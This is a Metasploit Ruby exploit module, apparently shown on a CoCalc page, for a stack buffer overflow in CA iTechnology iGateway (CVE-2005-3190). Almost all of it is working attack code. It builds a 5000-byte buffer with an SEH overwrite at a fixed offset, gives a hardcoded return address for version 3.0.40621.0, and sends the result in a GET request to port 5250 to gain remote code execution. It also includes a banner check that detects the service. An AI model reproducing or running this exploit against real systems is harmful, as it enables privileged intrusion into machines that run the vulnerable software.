CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a vulnerability in the Computer Associates
17
        iTechnology iGateway component. When <Debug>True</Debug> is enabled
18
        in igateway.conf (non-default), it is possible to overwrite the stack
19
        and execute code remotely. This module works best with Ordinal payloads.
20
      },
21
      'Author'         => 'aushack',
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'CVE', '2005-3190' ],
26
          [ 'OSVDB', '19920' ],
27
          [ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
28
          [ 'EDB', '1243' ],
29
          [ 'BID', '15025' ],
30
        ],
31
      'DefaultOptions' =>
32
        {
33
          'EXITFUNC' => 'seh',
34
        },
35
      'Payload'        =>
36
        {
37
          'Space'    => 1024,
38
          'BadChars' => "\x00\x0a\x0d\x20",
39
          'StackAdjustment' => -3500,
40
          'Compat'   =>
41
          {
42
            'ConnectionType' => '+ws2ord',
43
          },
44
        },
45
      'Platform'       => 'win',
46
      'Targets'        =>
47
        [
48
          [ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
49
        ],
50
      'Privileged'     => true,
51
      'DisclosureDate' => '2005-10-06',
52
      'DefaultTarget'  => 0))
53

54
    register_options(
55
      [
56
        Opt::RPORT(5250),
57
      ])
58
  end
59

60
  def check
61
    connect
62
    sock.put("HEAD / HTTP/1.0\r\nHost: #{rhost}\r\n\r\n")
63
    banner = sock.get_once
64

65
    if (banner.to_s =~ /GET and POST methods are the only methods supported at this time/) # Unique?
66
      return Exploit::CheckCode::Detected
67
    end
68
    return Exploit::CheckCode::Safe
69
  end
70

71
  def exploit
72
    connect
73

74
    seh = generate_seh_payload(target.ret)
75
    buffer = Rex::Text.rand_text_alphanumeric(5000)
76
    buffer[1082, seh.length] = seh
77
    sploit = "GET /" + buffer + " HTTP/1.0"
78

79
    sock.put(sploit + "\r\n\r\n\r\n")
80

81
    disconnect
82
    handler
83
  end
84
end
85

86